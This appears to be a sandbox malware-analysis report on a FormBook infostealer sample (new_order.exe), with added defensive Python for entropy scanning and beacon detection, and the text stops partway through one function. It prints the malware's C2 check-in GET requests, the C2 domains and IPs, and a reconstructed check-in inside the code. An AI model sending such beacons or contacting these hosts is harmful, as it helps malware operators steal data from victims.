SHA-512: 19F4CD5199FAC52D27B82A29074BC72E6A0DED01D3DE3C40F7BD18D51C395DF542B5E43F9A7DB4158F8D274CE80033D22B2FA666F35BF86C3E84557ECEF8D6A4
Malicious: false
Reputation: low
Preview: b....u.}.;...G......w.....\.j..5.../+..|...i.~..F...H..@....m.....3....../.PUpW.x......W..~..h/..C...B..K.[l.78......W....;.|b....g......K.Xv.s.....`B.!...r....o.o..W.=..;fY$ u..I......n.9.z.'.&.v o..*~...t.f...k...Vs..%qsjW'..(Z..}..[.^..l.u..s...@m.8....q.....].G[.5.../+.V|....i.~..F...H..@...&..u}.qsS3.#.......o.u./...z..[<.!;.|.......}d..@...d....W....m.=.o........g....<.......C..A_.....}......W.=...... u.V.^..4.....9.z.'.&.. E.%B.......f...k..A....%qs..'...Z.y}....^...l.u.}sZ..@m.8,.........j..5.../+..|...i.~..F...H..@...&..u}.qsS3.#.......o.u./...z..[<.!;.|.......}d..@...d....W....m.=.o........g....<.......C..A_.....}......W.=..;fY$ u......4...F.9.z.'.&.. E.%B.....t.f...k..A....%qs..'...Z.y}....^...l.u.}sZ..@m.8,.........j..5.../+..|...i.~..F...H..@...&..u}.qsS3.#.......o.u./...z..[<.!;.|.......}d..@...d....W....m.=.o........g....<.......C..A_.....}......W.=..;fY$ u......4...F.9.z.'.&.. E.%B.....t.f...k..
Process: C:\Users\user\Desktop\new_order.exe
File Type: data
Category: dropped
Size (bytes): 5121
Entropy (8bit): 6.1275996039074005
Encrypted: false
SSDEEP: 96:vbcnI6/Wjco+SbpVX0VS4nSeTAt0UoSrxxqx3gJu5FyxwqS1LitlcqtvuZCb:onI6/WF7USYSlw5U+qS1A3vugb
MD5: 5B3B44011F4EAB4760A86C6146D779C1
SHA1: E9AFDB159B4F7F7F1088B530A4AAC2DA079E3C7A
SHA-256: 6C15CB1164F3F702D601A9BA18E6BBC4EF93D851778A725BC31308EED7760C37
SHA-512: 2E4D4701C2506BF75FE8297B596ACB749DB6052330A00A2185D29A8FE879A37FA038C4F4AE1372D53245E532FAE97CE1A4FE3247875010ADCC2B8D9E197579D2
Malicious: false
Reputation: low
Preview: L;jcc..O.O......Scr.#.rv.Cr.#.rv.K..[c*._.ccc..Wcb.ob.s.[.K`ccc.;.?b.ob.s.[.KKccc.3.7b.ob.s.[.K6ccc.+./b.ob.s.[.K!ccc.#.'..sg..k..#ff.o..C.G.s.Kg.,.K.O.K._.g$.5.s.ZT.Kf._.g%._....W.GS.Kcccc.g.h..._b.;.b.3.b.+..b.#..b.C.b.K..Y.s..oZ..W..Qd.Sb.;...krh.Sf._Kcccc*..g.ccc.g.p...W...S....H.%oc..O..r.#.rv.[.k.c..o..k.c.s.w$.[.$g._.k.c..k.d.[._.H.%oc.y]).K.eccK.ecc%wc..bB.K.eccK.ecc%kc.p...K.eccK.ecc%kc..O.O.r.#.rv.K*.[sccc.;._..[c.y._)cc._.._.[..[NGKwhcc.#..k..k..,c.p;.p?.K..k.$Dc.p;.p?.e.k..#c.h;...bB.K4dcc.K1`bb.WNr.K.b.kK.bbb.W..Wc.i..ScNj*.Sdccc.S.H.%gc..O.O.r.#.rv.K*.[.ccc.#._..[c.y._)cc._.._.[..[NGK.gcc.#r..ccc.k..k..,c.p#.p'.o..k.$Dc.p#.p'.s..k.4D.p#.p'.w.,.k..5f.x#.x'.K..k.$De.p#.p'.h.k..#c.h#..y]).KIccc.KF_bb.W..{c.k.K.{.dNzb.{b.wb.sb.ob.kK.abb.W..Wc.i..ScNj*.Sdccc.S.H.%wc..O.O.*.[sccc.G._..[c.y._)cc._.._.[..[NGK.fcc.#..k..k..,c.pG.pK.o..k.$Dc.pG.pK.e.k..#c.hG..p...K.ccc.K._bb.WNqb.
Process: C:\Users\user\Desktop\new_order.exe
File Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 20992
Entropy (8bit): 5.741159742941817
Encrypted: false
SSDEEP: 384:uo6PUQ1aldbpD3HXY0QmwiEiTIYKopaZUb6xhbofSb:uoG1albrXY0HwinMdZeUhboab
MD5: 86475A0DBD24B01BCD1B264FECFDF1A2
SHA1: 745CE764EB6C9BF86E5AE65A5F365E7FAF14A394
SHA-256: 4CE85A4D12AA0D5B072330DBC50393D2D29EBA5321BEB3B3BFC6C4A8E9306AD7
SHA-512: E14DC2F083BD976482554B62B875645815F6F6BCB9B604B366B7F854E2620222DE8F038BB8DDBC2026082476246A9CC1855C6AA1B1CC2A1415FEB4A75B4EACA1
Malicious: false
Reputation: low
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Q...0...0...0...[...0...0..0..Mn...0..Mn...0..Hn...0..Mn...0..Rich.0..................PE..L...U..a...........!.....@...................P............................................@.........................0Q..L...|Q.......`.......................p.......................................................P..0............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.rsrc........`.......N..............@..@.reloc.......p.......P..............@..B........................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\new_order.exe
File Type: data
Category: dropped
Size (bytes): 267309
Entropy (8bit): 7.661744346775928
Encrypted: false
SSDEEP: 6144:R7t0RpX6EopogjVRtFMZ1Y77rCTV3t4cEvcGDw:Jt0WEczRi1+CZtmcG
MD5: 852AD076286B6472228677C4224BDDD7
SHA1: D11BEB7702EC783895F2CE4507F49B8333D6D555
SHA-256: 6C64A99477E6D61945489DF8DCEF2AF8782AE6D5E9C50F5F5085D4970225370B
SHA-512: F524F2CC5DD2280BBD8E81A8629E523F840E52F1F4FBC561E0782A0E324EDAB4D15D56DD55D6484E766263E20E14594FF82B9BAE7FE1D7AEA65BB03AFB0DFA03
Malicious: false
Reputation: low
Preview: .c......,...................3....K.......b.......c..........................................................................................................................................................................................................................................J...............S...j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
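The Entropy (8bit) and Encrypted fields in the dropped-file records above are what separate the 215,627-byte blob (7.99, flagged encrypted) from the 267,309-byte one (7.66, not flagged). The following is an added example, not code from the report or from Joe Sandbox: it computes the same byte-frequency (Shannon) entropy, applies an assumed cut-off of 7.9 (Joe Sandbox's real threshold is not stated on the page; 7.9 merely falls between the two values above), and scans a buffer in fixed windows to locate the high-entropy region, which is how an analyst finds an encrypted payload embedded in an otherwise ordinary file. The input is constructed (a repeated DOS-stub header followed by a seeded pseudo-random blob) because the dropped files themselves are not on the page.

```python
"""Shannon entropy of a buffer, whole and in sliding windows.

Added example, not part of the Joe Sandbox report. ENCRYPTED_THRESHOLD is an
assumption (the report's cut-off is not given); build_sample() is constructed
input standing in for the dropped files, which are not included on the page.
"""
import math
import random
from typing import List, Tuple

ENCRYPTED_THRESHOLD = 7.9   # assumption: sits between the report's 7.66 (not flagged) and 7.99 (flagged)


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for a constant buffer, 8.0 for a uniform one."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def looks_encrypted(data: bytes, threshold: float = ENCRYPTED_THRESHOLD) -> bool:
    """Whole-buffer test, the same kind of check behind an 'Encrypted: true' field."""
    return shannon_entropy(data) >= threshold


def high_entropy_regions(data: bytes, window: int = 512,
                         threshold: float = 7.0) -> List[Tuple[int, int]]:
    """Scan fixed windows and merge consecutive hot ones into (start, end) byte ranges.

    This locates an encrypted/compressed blob inside a file whose overall
    entropy is diluted by low-entropy headers and code.
    """
    regions: List[Tuple[int, int]] = []
    start = None
    for off in range(0, len(data), window):
        hot = shannon_entropy(data[off:off + window]) >= threshold
        if hot and start is None:
            start = off
        elif not hot and start is not None:
            regions.append((start, off))
            start = None
    if start is not None:
        regions.append((start, len(data)))
    return regions


def build_sample(header_len: int = 1024, blob_len: int = 4096, seed: int = 1) -> bytes:
    """Constructed test input: a repeated DOS-stub-like header, then a seeded random blob."""
    rng = random.Random(seed)
    stub = b"MZ" + b"\x00" * 14 + b"This program cannot be run in DOS mode\r\n"
    header = (stub * (header_len // len(stub) + 1))[:header_len]
    blob = bytes(rng.getrandbits(8) for _ in range(blob_len))
    return header + blob


if __name__ == "__main__":
    sample = build_sample()
    print("whole-file entropy: %.3f" % shannon_entropy(sample))
    print("high-entropy regions:", high_entropy_regions(sample))
```

Whole-file entropy on its own is a blunt signal: the NSIS installer in this report is 7.93 overall, yet its .text section is only 6.47, so the windowed scan is what points at the appended archive rather than the stub code.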
File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.929386224484157
TrID:
• Win32 Executable (generic) a (10002005/4) 92.16%
• NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: new_order.exe
File size: 253458
MD5: a0e70d1760e60d81e0f4ac2904fa8002
SHA1: 0512dcf545274ac6512abf3fb31a6fff41614280
SHA256: 0cd606362bbe747f3d0c0193675ce46ea2920fba28580b784f50a2969bbb0c27
SHA512: 59c04bc30b9f279d434428011efe80d41fd5de99c92165c77dc2a097b742c60e676f65d6185c90d9e5ddfd181fd4a32c7d237ca75ed2be978c6b951be6ae8588
SSDEEP: 6144:ow9b+8zbnoCMYqpvN/NlL7A+H9zKeKE6QGLxWyvS:NzzkzX7A+HJPifLu
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.....
Icon Hash: b2a88c96b2ca6a72
Entrypoint: 0x403225
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics: (none)
Time Stamp: 0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC] (the link time of the prebuilt NSIS stub, not of this sample; NSIS does not relink the stub when an installer is built, so this value says nothing about when the payload was packaged)
TLS Callbacks: (none)
CLR (.Net) Version: (none)
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 099c0646ea7282d232219f8807883be0
Entrypoint instructions (starting at 0x403225):
                        sub esp, 00000180h
                        push ebx
                        push ebp
                        push esi
                        xor ebx, ebx
                        push edi
                        mov dword ptr [esp+18h], ebx
                        mov dword ptr [esp+10h], 00409128h
                        xor esi, esi
                        mov byte ptr [esp+14h], 00000020h
                        call dword ptr [00407030h]
                        push 00008001h
                        call dword ptr [004070B4h]
                        push ebx
                        call dword ptr [0040727Ch]
                        push 00000008h
                        mov dword ptr [00423F58h], eax
                        call 00007F733D0CE320h
                        mov dword ptr [00423EA4h], eax
                        push ebx
                        lea eax, dword ptr [esp+34h]
                        push 00000160h
                        push eax
                        push ebx
                        push 0041F450h
                        call dword ptr [00407158h]
                        push 004091B0h
                        push 004236A0h
                        call 00007F733D0CDFD7h
                        call dword ptr [004070B0h]
                        mov edi, 00429000h
                        push eax
                        push edi
                        call 00007F733D0CDFC5h
                        push ebx
                        call dword ptr [0040710Ch]
                        cmp byte ptr [00429000h], 00000022h
                        mov dword ptr [00423EA0h], eax
                        mov eax, edi
                        jne 00007F733D0CB7ECh
                        mov byte ptr [esp+14h], 00000022h
                        mov eax, 00429001h
                        push dword ptr [esp+14h]
                        push eax
                        call 00007F733D0CDAB8h
                        push eax
                        call dword ptr [0040721Ch]
                        mov dword ptr [esp+1Ch], eax
                        jmp 00007F733D0CB845h
                        cmp cl, 00000020h
                        jne 00007F733D0CB7E8h
                        inc eax
                        cmp byte ptr [eax], 00000020h
                        je 00007F733D0CB7DCh
                        cmp byte ptr [eax], 00000022h
                        mov byte ptr [eax+eax+00h], 00000000h
                        Programming Language:
                        • [EXP] VC++ 6.0 SP5 build 8804
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x73a4           0xb4          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x2c000          0x900         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x7000           0x28c         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text   0x1000           0x5976        0x5a00    False     0.668619791667   data       6.46680044621  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0x7000           0x1190        0x1200    False     0.444878472222   data       5.17796812871  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x9000           0x1af98       0x400     False     0.55078125       data       4.68983486809  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata  0x24000          0x8000        0x0       False     0                empty      0.0            IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc   0x2c000          0x900         0xa00     False     0.409375         data       3.94693169534  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

The uninitialized .ndata section (raw size 0) is characteristic of the NSIS stub, matching the file-type and TrID identification above. The raw sections total only 0x5a00 + 0x1200 + 0x400 + 0xa00 = 31232 bytes, so roughly 218 KB of the 253458-byte file lies outside the PE sections as an overlay: the appended NSIS archive from which the dropped files listed above are unpacked.
Name           RVA      Size   Type                                                                          Language  Country
RT_ICON        0x2c190  0x2e8  data                                                                          English   United States
RT_DIALOG      0x2c478  0x100  data                                                                          English   United States
RT_DIALOG      0x2c578  0x11c  data                                                                          English   United States
RT_DIALOG      0x2c698  0x60   data                                                                          English   United States
RT_GROUP_ICON  0x2c6f8  0x14   data                                                                          English   United States
RT_MANIFEST    0x2c710  0x1eb  XML 1.0 document, ASCII text, with very long lines, with no line terminators  English   United States
Imports (DLL: functions)
KERNEL32.dll: CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
USER32.dll: EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll: SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll: SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll: RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll: ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll: CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll: GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
Language of compilation system: English (country where language is spoken: United States)
Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP       Dest IP
01/28/22-10:35:12.114127  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49806        80         192.168.2.4     34.102.136.180
01/28/22-10:35:12.114127  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49806        80         192.168.2.4     34.102.136.180
01/28/22-10:35:12.114127  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49806        80         192.168.2.4     34.102.136.180
01/28/22-10:35:12.228646  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49806      34.102.136.180  192.168.2.4
01/28/22-10:35:33.102852  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49829        80         192.168.2.4     3.64.163.50
01/28/22-10:35:33.102852  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49829        80         192.168.2.4     3.64.163.50
01/28/22-10:35:33.102852  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49829        80         192.168.2.4     3.64.163.50
TCP packets
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Jan 28, 2022 10:35:12.094950914 CET  49806        80         192.168.2.4     34.102.136.180
Jan 28, 2022 10:35:12.113820076 CET  80           49806      34.102.136.180  192.168.2.4
Jan 28, 2022 10:35:12.113967896 CET  49806        80         192.168.2.4     34.102.136.180
Jan 28, 2022 10:35:12.114126921 CET  49806        80         192.168.2.4     34.102.136.180
Jan 28, 2022 10:35:12.133012056 CET  80           49806      34.102.136.180  192.168.2.4
Jan 28, 2022 10:35:12.228646040 CET  80           49806      34.102.136.180  192.168.2.4
Jan 28, 2022 10:35:12.228684902 CET  80           49806      34.102.136.180  192.168.2.4
Jan 28, 2022 10:35:12.228990078 CET  49806        80         192.168.2.4     34.102.136.180
Jan 28, 2022 10:35:12.348798990 CET  49806        80         192.168.2.4     34.102.136.180
Jan 28, 2022 10:35:12.367767096 CET  80           49806      34.102.136.180  192.168.2.4
Jan 28, 2022 10:35:33.082981110 CET  49829        80         192.168.2.4     3.64.163.50
Jan 28, 2022 10:35:33.102547884 CET  80           49829      3.64.163.50     192.168.2.4
Jan 28, 2022 10:35:33.102688074 CET  49829        80         192.168.2.4     3.64.163.50
Jan 28, 2022 10:35:33.102852106 CET  49829        80         192.168.2.4     3.64.163.50
Jan 28, 2022 10:35:33.121958971 CET  80           49829      3.64.163.50     192.168.2.4
Jan 28, 2022 10:35:33.121994019 CET  80           49829      3.64.163.50     192.168.2.4
Jan 28, 2022 10:35:33.122025013 CET  80           49829      3.64.163.50     192.168.2.4
Jan 28, 2022 10:35:33.122153044 CET  49829        80         192.168.2.4     3.64.163.50
Jan 28, 2022 10:35:33.122200012 CET  49829        80         192.168.2.4     3.64.163.50
Jan 28, 2022 10:35:33.141402006 CET  80           49829      3.64.163.50     192.168.2.4
UDP packets
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Jan 28, 2022 10:35:12.069257975 CET  56627        53         192.168.2.4  8.8.8.8
Jan 28, 2022 10:35:12.088390112 CET  53           56627      8.8.8.8      192.168.2.4
Jan 28, 2022 10:35:33.026738882 CET  56621        53         192.168.2.4  8.8.8.8
Jan 28, 2022 10:35:33.047683001 CET  53           56621      8.8.8.8      192.168.2.4
Jan 28, 2022 10:35:53.270422935 CET  64801        53         192.168.2.4  8.8.8.8
Jan 28, 2022 10:35:53.404603004 CET  53           64801      8.8.8.8      192.168.2.4
DNS queries
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                            Type            Class
Jan 28, 2022 10:35:12.069257975 CET  192.168.2.4  8.8.8.8  0x5dc9    Standard query (0)  www.royalfountainlogistics.com  A (IP address)  IN (0x0001)
Jan 28, 2022 10:35:33.026738882 CET  192.168.2.4  8.8.8.8  0xe568    Standard query (0)  www.bitherders.com              A (IP address)  IN (0x0001)
Jan 28, 2022 10:35:53.270422935 CET  192.168.2.4  8.8.8.8  0xf305    Standard query (0)  www.mydemosite0.com             A (IP address)  IN (0x0001)
DNS answers
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                            CName / Address             Type                    Class
Jan 28, 2022 10:35:12.088390112 CET  8.8.8.8    192.168.2.4  0x5dc9    No error (0)  www.royalfountainlogistics.com  royalfountainlogistics.com  CNAME (Canonical name)  IN (0x0001)
Jan 28, 2022 10:35:12.088390112 CET  8.8.8.8    192.168.2.4  0x5dc9    No error (0)  royalfountainlogistics.com      34.102.136.180              A (IP address)          IN (0x0001)
Jan 28, 2022 10:35:33.047683001 CET  8.8.8.8    192.168.2.4  0xe568    No error (0)  www.bitherders.com              3.64.163.50                 A (IP address)          IN (0x0001)
Jan 28, 2022 10:35:53.404603004 CET  8.8.8.8    192.168.2.4  0xf305    No error (0)  www.mydemosite0.com             mydemosite0.com             CNAME (Canonical name)  IN (0x0001)
Jan 28, 2022 10:35:53.404603004 CET  8.8.8.8    192.168.2.4  0xf305    No error (0)  mydemosite0.com                 67.225.236.76               A (IP address)          IN (0x0001)
                        • www.royalfountainlogistics.com
                        • www.bitherders.com
Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
0           192.168.2.4  49806        34.102.136.180  80                C:\Windows\explorer.exe

Timestamp                            kBytes transferred  Direction  Data
Jan 28, 2022 10:35:12.114126921 CET  10406               OUT        GET /os16/?XL3pvD=fPwrUrgVvuqeO931Dg4gzzbtrd7thr2/NsJ/u9TrNiEyg4FeGnR3RlXi6kvbgSn2o0yC&m0Dd=nFQHcLg0mfV8fj HTTP/1.1
Host: www.royalfountainlogistics.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 28, 2022 10:35:12.228646040 CET  10407               IN         HTTP/1.1 403 Forbidden
                        Server: openresty
                        Date: Fri, 28 Jan 2022 09:35:12 GMT
                        Content-Type: text/html
                        Content-Length: 275
                        ETag: "61f22041-113"
                        Via: 1.1 google
                        Connection: close
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
1           192.168.2.4  49829        3.64.163.50     80                C:\Windows\explorer.exe

Timestamp                            kBytes transferred  Direction  Data
Jan 28, 2022 10:35:33.102852106 CET  10459               OUT        GET /os16/?XL3pvD=wD4cT7q48NFnhCndHw9GtexQ1GWRT95jx29TDgoZhFSVm5lLt3bl1PAkaHfi4RiaXjL3&m0Dd=nFQHcLg0mfV8fj HTTP/1.1
Host: www.bitherders.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 28, 2022 10:35:33.121994019 CET  10460               IN         HTTP/1.1 410 Gone
                        Server: openresty
                        Date: Fri, 28 Jan 2022 09:35:37 GMT
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 65 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 62 69 74 68 65 72 64 65 72 73 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 61 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 62 69 74 68 65 72 64 65 72 73 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='5; url=http://www.bitherders.com/' />a </head>9 <body>3a You are being redirected to http://www.bitherders.coma </body>8</html>0
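The two sessions above, together with the Snort alerts (ET TROJAN FormBook CnC Checkin (GET)) they triggered, show the check-in shape: a GET to /os16/ with two query parameters, only Host and Connection: close as headers, no User-Agent, and a 7-byte all-NUL body on a GET. The following is an added example, not part of the report and not the logic of the ET rules (whose content is not on this page): it parses the session-0 request exactly as captured above, reports which of those traits are present, and rebuilds the URL in the form the report's URL table lists it. The heuristics are illustrative thresholds chosen here, not published signatures. Note that the 403 and 410 responses do not make the traffic benign: the report marks bitherders.com malicious and royalfountainlogistics.com not, and the DNS log shows the sample moving on to the next host in its list about every twenty seconds, so the host set should be handled together.

```python
"""Parse a captured FormBook-style check-in and apply beacon heuristics.

Added example, not part of the Joe Sandbox report. CAPTURED_REQUEST is
reconstructed from the report's session 0 (explorer.exe -> 34.102.136.180:80);
the indicator thresholds in beacon_indicators() are this example's own choices.
"""
from typing import Dict, List
from urllib.parse import parse_qsl, urlsplit

# Constructed from the report's session 0: request line, two headers, 7 NUL bytes of body.
CAPTURED_REQUEST = (
    b"GET /os16/?XL3pvD=fPwrUrgVvuqeO931Dg4gzzbtrd7thr2/NsJ/u9TrNiEyg4FeGnR3RlXi6kvbgSn2o0yC"
    b"&m0Dd=nFQHcLg0mfV8fj HTTP/1.1\r\n"
    b"Host: www.royalfountainlogistics.com\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"\x00\x00\x00\x00\x00\x00\x00"
)


def parse_http_request(raw: bytes) -> Dict:
    """Split a raw HTTP/1.x request into method, version, path, query, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    return {
        "method": method,
        "version": version,
        "path": parts.path,
        "query": dict(parse_qsl(parts.query, keep_blank_values=True)),
        "headers": headers,
        "body": body,
    }


def beacon_indicators(req: Dict) -> List[str]:
    """Return the traits (from the report's sessions) that this request exhibits."""
    reasons: List[str] = []
    h = req["headers"]
    if "user-agent" not in h:
        reasons.append("no User-Agent header")
    if req["method"] == "GET" and req["body"] and set(req["body"]) == {0}:
        reasons.append("GET carries a %d-byte all-NUL body" % len(req["body"]))
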